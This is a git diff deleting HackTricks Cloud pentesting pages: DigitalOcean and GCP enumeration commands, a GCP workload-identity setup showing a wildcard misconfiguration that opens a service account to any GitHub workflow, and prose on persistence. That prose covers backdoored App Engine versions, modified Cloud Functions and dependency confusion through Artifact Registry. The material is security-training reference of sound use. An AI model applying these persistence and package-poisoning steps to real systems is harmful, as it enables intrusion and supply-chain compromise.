-{% endhint %} - -### Domains - -```bash -doctl compute domain list -doctl compute domain records list -# You can also create records -``` - -### Reserverd IPs - -```bash -doctl compute reserved-ip list -doctl compute reserved-ip-action unassign -``` - -### Load Balancers - -```bash -doctl compute load-balancer list -doctl compute load-balancer remove-droplets --droplet-ids 12,33 -doctl compute load-balancer add-forwarding-rules --forwarding-rules entry_protocol:tcp,entry_port:3306,... -``` - -### VPC - -``` -doctl vpcs list -``` - -### Firewall - -{% hint style="danger" %} -By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. -{% endhint %} - -```bash -doctl compute firewall list -doctl compute firewall list-by-droplet -doctl compute firewall remove-droplets --droplet-ids -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
deleted file mode 100644
index bc82b2449..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# DO - Projects
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\
-> For more info check:
-
-{% content-ref url="../do-basic-information.md" %}
-[do-basic-information.md](../do-basic-information.md)
-{% endcontent-ref %}
-
-### Enumeration
-
-It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily:
-
-```bash
-doctl projects list # Get projects
-doctl projects resources list # Get all the resources of a project
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
deleted file mode 100644
index a19a48b8f..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md
+++ /dev/null
@@ -1,72 +0,0 @@
-# DO - Spaces
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers.
-
-### Access
-
-Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space.
-
-A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\
-Note the **region** as **subdomain**.
-
-Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials).
-
-However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time:
-
-
- -### Enumeration - -```bash -# Unauthenticated -## Note how the region is specified in the endpoint -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname - -# Authenticated -## Configure spaces keys as AWS credentials -aws configure -AWS Access Key ID [None]: -AWS Secret Access Key [None]: -Default region name [None]: -Default output format [None]: - -## List all buckets in a region -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com - -## List files inside a bucket -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname - -## It's also possible to generate authorized access to buckets from the API -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
deleted file mode 100644
index ce5d000ad..000000000
--- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md
+++ /dev/null
@@ -1,41 +0,0 @@
-# DO - Volumes
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups.
-
-### Enumeration
-
-```
-compute volume list
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
deleted file mode 100644
index 0f902f914..000000000
--- a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md
+++ /dev/null
@@ -1,181 +0,0 @@
-# GCP - Federation Abuse
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## OIDC - Github Actions Abuse - -### GCP - -In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed: - -* **Create the Service Account** to access from github actions with the **desired permissions:** - -```bash -projectId=FIXME -gcloud config set project $projectId - -# Create the Service Account -gcloud iam service-accounts create "github-demo-sa" -saId="github-demo-sa@${projectId}.iam.gserviceaccount.com" - -# Enable the IAM Credentials API -gcloud services enable iamcredentials.googleapis.com - -# Give permissions to SA - -gcloud projects add-iam-policy-binding $projectId \ - --member="serviceAccount:$saId" \ - --role="roles/iam.securityReviewer" -``` - -* Generate a **new workload identity pool**: - -```bash -# Create a Workload Identity Pool -poolName=wi-pool - -gcloud iam workload-identity-pools create $poolName \ - --location global \ - --display-name $poolName - -poolId=$(gcloud iam workload-identity-pools describe $poolName \ - --location global \ - --format='get(name)') -``` - -* Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario): - -```bash -attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization) - -gcloud iam workload-identity-pools providers create-oidc $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --display-name $poolName \ - --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \ - --issuer-uri "https://token.actions.githubusercontent.com" - -providerId=$(gcloud iam workload-identity-pools providers describe $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --format='get(name)') -``` - -* Finally, **allow the principal** from the provider to use a 
service principal: - -```bash -gitHubRepoName="repo-org/repo-name" -gcloud iam service-accounts add-iam-policy-binding $saId \ - --role "roles/iam.workloadIdentityUser" \ - --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}" -``` - -{% hint style="warning" %} -Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used). - -However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard: -{% endhint %} - -
# Create a Workload Identity Pool
-poolName=wi-pool2
-
-gcloud iam workload-identity-pools create $poolName \
-  --location global \
-  --display-name $poolName
-
-poolId=$(gcloud iam workload-identity-pools describe $poolName \
-  --location global \
-  --format='get(name)')
-
-gcloud iam workload-identity-pools providers create-oidc $poolName \
-  --project="${projectId}" \
-  --location="global" \
-  --workload-identity-pool="$poolName" \
-  --display-name="Demo provider" \
-  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
-  --issuer-uri="https://token.actions.githubusercontent.com"
-
-providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
-  --location global \
-  --workload-identity-pool $poolName \
-  --format='get(name)')
-
-# CHECK THE WILDCARD
-gcloud iam service-accounts add-iam-policy-binding "${saId}" \
-  --project="${projectId}" \
-  --role="roles/iam.workloadIdentityUser" \
-  --member="principalSet://iam.googleapis.com/${poolId}/*"
-
- -{% hint style="warning" %} -In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\ -It should be always something like this: - -`attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` -{% endhint %} - -### Github - -Remember to change **`${providerId}`** and **`${saId}`** for their respective values: - -```yaml -name: Check GCP action -on: - workflow_dispatch: - pull_request: - branches: - - main - -permissions: - id-token: write - -jobs: - Get_OIDC_ID_token: - runs-on: ubuntu-latest - steps: - - id: 'auth' - name: 'Authenticate to GCP' - uses: 'google-github-actions/auth@v2.1.3' - with: - create_credentials_file: 'true' - workload_identity_provider: '${providerId}' # In the providerId, the numerical project ID (12 digit number) should be used - service_account: '${saId}' # instead of the alphanumeric project ID. ex: - activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' - - id: 'gcloud' - name: 'gcloud' - run: |- - gcloud config set project - gcloud config set account '${saId}' - gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}" - gcloud auth list - gcloud projects list - gcloud secrets list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
deleted file mode 100644
index d94452728..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - API Keys Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## API Keys
-
-For more information about API Keys check:
-
-{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %}
-[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md)
-{% endcontent-ref %}
-
-### Create new / Access existing ones
-
-Check how to do this in:
-
-{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %}
-[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
deleted file mode 100644
index ef9829d83..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - App Engine Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## App Engine
-
-For more information about App Engine check:
-
-{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
-[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
-{% endcontent-ref %}
-
-### Modify code
-
-If yoi could just modify the code of a running version or create a new one yo could make it run your backdoor and mantain persistence.
-
-### Old version persistence
-
-**Every version of the web application is going to be run**, if you find that an App Engine project is running several versions, you could **create a new one** with your **backdoor** code, and then **create a new legit** one so the last one is the legit but there will be a **backdoored one also running**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
deleted file mode 100644
index 234708928..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# GCP - Artifact Registry Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Dependency Confusion - -* What happens if a **remote and a standard** repositories **are mixed in a virtual** one and a package exists in both? - * The one with the **highest priority set in the virtual repository** is used - * If the **priority is the same**: - * If the **version** is the **same**, the **policy name alphabetically** first in the virtual repository is used - * If not, the **highest version** is used - -{% hint style="danger" %} -Therefore, it's possible to **abuse a highest version (dependency confusion)** in a public package registry if the remote repository has a higher or same priority -{% endhint %} - -This technique can be useful for **persistence** and **unauthenticated access** as to abuse it it just require to **know a library name** stored in Artifact Registry and **create that same library in the public repository (PyPi for python for example)** with a higher version. - -For persistence these are the steps you need to follow: - -* **Requirements**: A **virtual repository** must **exist** and be used, an **internal package** with a **name** that doesn't exist in the **public repository** must be used. -* Create a remote repository if it doesn't exist -* Add the remote repository to the virtual repository -* Edit the policies of the virtual registry to give a higher priority (or same) to the remote repository.\ - Run something like: - * [gcloud artifacts repositories update --upstream-policy-file ...](https://cloud.google.com/sdk/gcloud/reference/artifacts/repositories/update#--upstream-policy-file) -* Download the legit package, add your malicious code and register it in the public repository with the same version. 
Every time a developer installs it, he will install yours! - -For more information about dependency confusion check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/dependency-confusion" %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
deleted file mode 100644
index 6aa03016c..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# GCP - BigQuery Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## BigQuery
-
-For more information about BigQuery check:
-
-{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
-[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
-{% endcontent-ref %}
-
-### Grant further access
-
-Grant further access over datasets, tables, rows and columns to compromised users or external users. Check the privileges needed and how to do this in the page:
-
-{% content-ref url="../gcp-privilege-escalation/gcp-bigquery-privesc.md" %}
-[gcp-bigquery-privesc.md](../gcp-privilege-escalation/gcp-bigquery-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
deleted file mode 100644
index 193e168de..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# GCP - Cloud Functions Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Cloud Functions
-
-For more info about Cloud Functions check:
-
-{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
-[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
-{% endcontent-ref %}
-
-### Persistence Techniques
-
-* **Modify the code** of the Cloud Function, even just the `requirements.txt`
-* **Allow anyone** to call a vulnerable Cloud Function or a backdoor one
-* **Trigger** a Cloud Function when something happens to infect something
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
deleted file mode 100644
index 909237bdd..000000000
--- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# GCP - Cloud Run Persistence
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
